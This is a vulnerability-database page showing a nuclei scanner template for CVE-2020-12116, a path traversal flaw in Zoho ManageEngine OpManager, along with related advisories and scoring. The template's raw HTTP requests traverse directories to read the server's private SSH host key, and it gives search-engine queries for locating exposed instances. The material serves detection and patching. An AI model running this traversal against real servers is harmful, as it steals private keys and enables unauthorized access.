Lucene search
K

Zoho ManageEngine OpManger - Arbitrary File Read

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 41 Views

Zoho ManageEngine OpManger vulnerability allows unauthenticated attacker to read arbitrary files on the server potentially leading to unauthorized access or data leakag

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Path Traversal in Zohocorp Manageengine_Opmanager
8 May 202015:56
githubexploit
ATTACKERKB
CVE-2020-12116
7 May 202000:00
attackerkb
Circl
CVE-2020-12116
14 May 202009:34
circl
CNVD
Zoho ManageEngine OpManager Information Disclosure Vulnerability (CNVD-2020-28455)
8 May 202000:00
cnvd
Check Point Advisories
Zoho ManageEngine Directory Traversal (CVE-2020-12116)
20 Jun 202000:00
checkpoint_advisories
CVE
CVE-2020-12116
7 May 202019:13
cve
Cvelist
CVE-2020-12116
7 May 202019:13
cvelist
NVD
CVE-2020-12116
7 May 202020:15
nvd
OSV
CVE-2020-12116
7 May 202020:15
osv
Prion
Cross site request forgery (csrf)
7 May 202020:15
prion
Rows per page
id: CVE-2020-12116

info:
  name: Zoho ManageEngine OpManger - Arbitrary File Read
  author: dwisiswant0
  severity: high
  description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.
  impact: |
    An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine OpManger to mitigate the vulnerability.
  reference:
    - https://github.com/BeetleChunks/CVE-2020-12116
    - https://nvd.nist.gov/vuln/detail/CVE-2020-12116
    - https://www.manageengine.com/network-monitoring/help/read-me-complete.html
    - https://www.manageengine.com/network-monitoring/help/read-me-complete.html#125125
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-12116
    cwe-id: CWE-22
    epss-score: 0.97418
    epss-percentile: 0.9989
    cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: zohocorp
    product: manageengine_opmanager
    shodan-query: http.title:"opmanager plus"
    fofa-query: title="opmanager plus"
    google-query: intitle:"opmanager plus"
  tags: cve,cve2020,zoho,lfi,manageengine,zohocorp,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Connection: close
      - |
        GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Cache-Control: max-age=0
        Connection: close
        Referer: http://{{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "BEGIN RSA PRIVATE KEY")'
          - 'status_code_2 == 200'
        condition: and

    extractors:
      - type: regex
        name: endpoint
        regex:
          - "(?m)/cachestart/.*/jquery/"
        internal: true
        part: body
# digest: 4b0a00483046022100dc8e91881c309044be5443ebfc8817edcd1f30d7bc3e5259291fac75ab9b72b4022100cd6625f3add0798fe8ff25c8b2d870615df14ed1d74746e0a095c0c69f14cff1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25
CVSS 3.17.5
EPSS0.97418
41